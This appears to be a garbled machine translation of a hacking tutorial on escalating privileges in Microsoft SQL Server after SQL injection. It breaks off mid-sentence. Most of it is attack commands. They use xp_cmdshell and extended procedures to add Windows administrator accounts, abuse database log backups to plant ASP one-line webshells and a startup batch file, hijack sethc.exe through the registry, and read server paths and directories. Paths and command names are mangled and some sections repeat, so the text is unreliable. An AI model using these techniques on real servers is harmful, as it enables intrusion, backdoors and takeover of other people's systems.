Summary of DBO-WER or sa Privilege Escalation

1. (column directory)
-------------------------------
Exec master .. xp_cmdshell ver
Xp_mongoshell cannot be used. Most servers, xp_mongoshell, cannot be used. Many people just give up on this step.
There is also a component problem. There are a lot of tutorials on restoring components on the Internet, but it is not necessarily usable to restore the components.
The following idea is to use XP_DIRTREE to list directories.
The backup startup item does not require any components, so this method can kill the DB.
Exec master .. xp_dirtree c:, 1, 1

2. (Backup startup Item)
-------------------------------
/* Back up a sentence or Bat using the Url or SQL queryserver Log */
Alter database [master] set recovery full --
Create table cmd (a image )--
Backup log [master] to disk = c: cmd1 with init --
Insert into cmd (a) values (values

Bytes

Bytes

Bytes

Signature )--
Backup log [master] to disk = C: Documents and SettingsAdministrator "start" Menu \ Program start \ start. bat --
Drop table cmd --
You can write some scripts for BAT and switch to HEX to replace
C: Documents and SettingsAdministrator Start Menu \ Program
Start. bat is started when you enter the server.
3. (create the sp_readtextfile Stored Procedure)
-------------------------------
Xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Create proc sp_readTextFile @ filename sysname
As

Begin
Set nocount on
Create table # tempfile (line varchar (8000 ))
Exec (bulk insert # tempfile from "+ @ filename + ")
Select * from # tempfile
Drop table # tempfile
End
Go

Xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Exec sp_readTextFile c: windowssystem32oot. dat eulagold.txt hallpage. sys

4. (image hijacking)
-------------------------------
Xp_regwrite HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe, debugger, reg_sz, c: windowssystem32cmd.exe

5. (elevation of weight in SA sandbox Mode)
-------------------------------
1. exec master .. xp_regwrite HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftJet4.0Engines, SandBoxMode, REG_DWORD, 0 ;--

2. Select * From OpenRowSet (Microsoft. Jet. OLEDB.4.0,; Database = c: windowssystem32iasias. mdb, select shell ("net user itpro gmasfm/add "));

Baklog to shell

Select name from master. dbo. sysdatabases

Use pubs
Alter database pubs set recovery full --
Create table cmd2 (a image )--
Backup log pubs to disk = c: Snapshot 22 with init --
Insert into cmd2 (a) values (<% eval request ("#") %> )--
Backup log pubs to disk = C: Ue48m. asp --
Drop table cmd2 --
Alter database pubs set recovery simple --

6. (add custom extension process)
-------------------------------
C: Ue48xplake2. dll

Sp_addextendedproc xp_lake2, C: Ue48xplake2. dll
EXEC xp_lake2 net user x $ x/add
EXEC xp_lake2 net localgroup administrators x $/add
Sp_dropextendedproc xp_lake2

7. (manual differential backup steps)
-------------------------------
1. Restore the current database
; Alter database Current database set recovery full --
2. Create a table cmd
; Create table cmd (a image )--
3. Back up the current database to D: cmd1
; Backup log current database to disk = D: cmd1 with init --
4. insert a sentence code to the created table cmd.
; Insert into cmd (a) values (<% 25 ** ecute (request ("a") % 25> )--
5. Back up one sentence of code to the site root directory
; Backup log current database to disk = D: www_weboct.asp --
6. Complete
; Drop table created table --
----------------------------------
Number Type
1. Restore the current database
; Alter database Current database set recovery full --
2. Create a table cmd
; Create table cmd (a image )--
3. Back up the current database to D: cmd1
; Backup log current database to disk = D: cmd1 with init --
4. insert a sentence code to the created table cmd.
; Insert into cmd (a) values (<% 25 ** ecute (request ("a") % 25> )--
5. Back up one sentence of code to the site root directory
; Backup log current database to disk = D: www_weboct.asp --
6. Complete
; Drop table created table --
--------------------------------
Sa permission to create an administrator user

1. Determine whether injection exists; and 1 = 1; and 1 = 2
; And user_name () = dbo determines whether the current system's connected user is sa

2. Add the system administrator
; Exec master. dbo. xp_mongoshell net user wk wk90/add ;--
; Exec master. dbo. xp_mongoshell net localgroup administrators wk/add ;--

7. (DBO permission log backup dedicated one-sentence Trojan)
--------------------------------
Adding response. end will have a different effect, that is, all the code after a sentence is inserted is invalid. In a single sentence, it will reduce the webshell size.
Log backup is divided into seven steps of the WEBSHELL standard:

1. InjectionURL '; alter database XXX set recovery full -- (set SQL to log FULL RECOVERY mode)

2. InjectionURL '; create table cmd (a image) -- (create a cmd table)

3. InjectionURL '; backup log XXX to disk = 'C: cmd' with init -- (reduce the size of the backup data)

4. InjectionURL '; insert into cmd (a) values (' "hexadecimal characters into the table

4. declare @ a sysname, @ s nvarchar (4000) select @ a = db_name (), @ s = 'C: Program FilesCommon FilesMicrosoft SharedWeb Server Extensions40isapihsqq. asp 'backup database @ a to disk = @ s with differential, FORMAT -- implements DIFFERENTIAL backup for the database. The backup storage path is tentatively set to the C directory and the file name is hsqq. asp.

5. drop table [jm_tmp] -- delete the table.

Code for reading the website physical path:

1. drop table [jm_tmp]; create table [jm_tmp] (value navrchar (4000) null, data nvarchar (4000) null) -- create a table

2. delete [jm_tmp]; insert [jm_tmp] exec master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'systemcontrolset001servicesw3svcparametersvirtual Roots', '/' -- insert the website directory to the table Field

3. and (select top 1 cast ([data] as nvarchar (4000) char (124) from [jm_tmp] order by [data] desc) = 0' // output field

4. drop table [jm_tmp] -- delete the table.

Code for reading the disk directory:

1. drop table [jm_tmp]; create table [jm_tmp] (subdirectory nvarchar (400) NULL, depth tinyint NULL, [file] bit NULL) -- create a table

2. delete [jm_tmp]; insert [jm_tmp] exec master .. xp_dirtree 'C: ', -- insert the folder and file of drive C into the table

3. and 1 = (select top 1 cast ([subdirectory] as nvarchar (400) char (124) cast ([file] as nvarchar (1) char (124) from (select Top 1 [subdirectory], [file] From [jm_tmp] orDER BY [file], [subdirectory]) T orDER BY [file] desc, [subdirectory] desc) '// returns the name of the first folder.

4. and 1 = (select top 1 cast ([subdirectory] as nvarchar (400) char (124) cast ([file] as nvarchar (1) char (124) from (select Top 2 [subdirectory], [file] From [jm_tmp] orDER BY [file], [subdirectory]) T orDER BY [file] desc, [subdirectory] desc) '// returns the name of the second folder.

5. and 1 = (select top 1 cast ([subdirectory] as nvarchar (400) char (124) cast ([file] as nvarchar (1) char (124) from (select Top X [subdirectory], [file] From [jm_tmp] orDER BY [file], [subdirectory]) T orDER BY [file] desc, [subdirectory] desc) '// returns the X folder or file name.

6. drop table [jm_tmp] -- delete the code for reading the physical path of the table Website:

1. drop table [jm_tmp]; create table [jm_tmp] (value navrchar (4000) null, data nvarchar (4000) null) -- create a table

2. delete [jm_tmp]; insert [jm_tmp] exec master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'systemcontrolset001servicesw3svcparametersvirtual Roots', '/' -- insert the website directory to the table Field

3. and (select top 1 cast ([data] as nvarchar (4000) char (124) from [jm_tmp] order by [data] desc) = 0' // output field

4. drop table [jm_tmp] -- delete the table.

DB_ONER permission during injection and the host and database are not in the same way

Actually, even if the database and WEB are not in the same place, there is still a chance. It doesn't mean that there is no chance. Generally, if the server is installed with the system, it will install IIS? List his drive C. Check if there is any Inetpub directory. Then you will know if he has installed IIS. But if you do not know his IP address, too? What should we do? You can PING the WEB server. scan port 1433 of the C segment. check which server is available. however, this method is not good. many hosts now enable the firewall. even if port 1433 is enabled, you cannot scan it. what should I do? You can use opend